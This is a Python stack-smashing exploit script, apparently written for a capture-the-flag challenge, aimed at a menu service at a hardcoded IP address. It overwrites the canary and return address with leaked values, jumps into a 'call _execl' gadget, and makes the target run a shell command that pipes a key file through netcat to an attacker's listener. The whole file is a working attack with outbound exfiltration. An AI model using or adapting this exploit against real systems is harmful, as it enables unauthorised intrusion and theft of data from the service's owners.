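"""Stack-smash exploit for the menu service at HOST:PORT (menu option 4).

After draining the banner and selecting option 4, the script sends an
overflow that rewrites the saved canary and frame slots with values leaked
from the target and returns into a ``call _execl`` gadget, so the service
runs ``/bin/sh -c "cat key | nc LISTENER_IP LISTENER_PORT"`` and pushes the
key to a listener we control (start it first, e.g. ``nc -lvp 5001``).

Usage: ``python exploit.py LISTENER_IP [LISTENER_PORT]``

CANARY, STACK_ADDR and SAVED_FRAME were read from one particular run of the
target; with stack randomisation they are only valid for that process and
must be re-leaked before reuse.  Only use against targets you are authorised
to attack.  Works on Python 2.7 and 3.
"""
import binascii
import socket
import struct
import sys

HOST = '58.229.183.18'
PORT = 8888

# Values observed on the target at exploit time (process-specific).
CANARY = 0x84c38b00
STACK_ADDR = 0xbfb0a7d8 - 0x28 + 0x10   # orig stack addr, rebased by -0x18
# Eight bytes that sit between the stack-address slot and the return
# address, copied verbatim from the leak.  The second dword is 0xbfb0a7e8,
# which looks like a saved frame pointer -- not verified.
SAVED_FRAME = binascii.unhexlify(b"b3e863b7e8a7b0bf")
EXECL_CALL = 0x08048C79   # 0x08048C79 -- call _execl (gadget in the target binary)
ARG2_PTR = 0x0804970a     # pointer into the binary used as one execl argument;
                          # its string contents are not visible here -- confirm
DEFAULT_LISTENER_PORT = 5001


def p32(value):
    """Pack `value` as an unsigned 32-bit little-endian dword."""
    return struct.pack("<I", value)


def build_payload(listener_ip, listener_port=DEFAULT_LISTENER_PORT,
                  stack_addr=STACK_ADDR, canary=CANARY):
    """Return the bytes to send after choosing menu option 4.

    Layout of the returned buffer:

        filler(10) | canary | stack_addr | SAVED_FRAME(8) | ret=call _execl |
        ptr(stack_addr+0x14) | ARG2_PTR | ptr(stack_addr+0x1c) |
        ptr(stack_addr+0x1f) | NULL dword |
        "/bin/sh\\0" | "-c\\0" | "cat key | nc IP PORT\\0"

    The three stack pointers target the string block at the end of the same
    buffer: "/bin/sh" is 0x14 bytes past the first pointer slot, "-c" is at
    0x1c and the nc command at 0x1f, so `stack_addr` has to be the runtime
    address of that first pointer slot (the argument block seen by the
    `call _execl` gadget) and the strings must keep exactly these offsets.

    Args:
        listener_ip: address the target can reach; embedded verbatim in the
            shell command (an unreachable or wrong value fails silently).
        listener_port: TCP port the listener is on (default 5001).
        stack_addr: leaked stack address the pointers are built from.
        canary: leaked stack canary (must match or the target aborts).
    """
    command = ("cat key | nc %s %d" % (listener_ip, listener_port)).encode("ascii")
    strings = b"/bin/sh\x00" + b"-c\x00" + command + b"\x00"
    frame = (
        b"yAAAAAAAAA"              # filler up to the canary slot
        + p32(canary)
        + p32(stack_addr)
        + SAVED_FRAME
        + p32(EXECL_CALL)          # overwritten return address -> call _execl
        + p32(stack_addr + 0x14)   # -> "/bin/sh"
        + p32(ARG2_PTR)            # -> string inside the binary
        + p32(stack_addr + 0x1c)   # -> "-c"
        + p32(stack_addr + 0x1f)   # -> nc command
        + b"\x00\x00\x00\x00"      # NULL that terminates execl's argument list
    )
    return frame + strings


def main(argv):
    """Connect, pick menu option 4, fire the payload and echo the replies.

    Returns a process exit status (2 on usage error, else 0).  Raises
    socket.error / socket.timeout if the target is unreachable or stops
    answering; the socket is always closed.
    """
    if len(argv) < 2:
        sys.stderr.write("usage: %s LISTENER_IP [LISTENER_PORT]\n" % argv[0])
        return 2
    listener_ip = argv[1]
    listener_port = int(argv[2]) if len(argv) > 2 else DEFAULT_LISTENER_PORT
    payload = build_payload(listener_ip, listener_port)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((HOST, PORT))
        # Timeout is set after connect (as in the original), so only the
        # reads/writes below are bounded, not the connect itself.
        sock.settimeout(4)
        for _ in range(5):          # drain the banner / menu text
            sock.recv(4096)
        sock.sendall(b"4\n")        # menu option the overflow lives behind
        sock.recv(4096)             # its prompt
        sock.sendall(payload)       # sendall: send() may write a partial buffer
        print(sock.recv(4096))
        print(sock.recv(4096))
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))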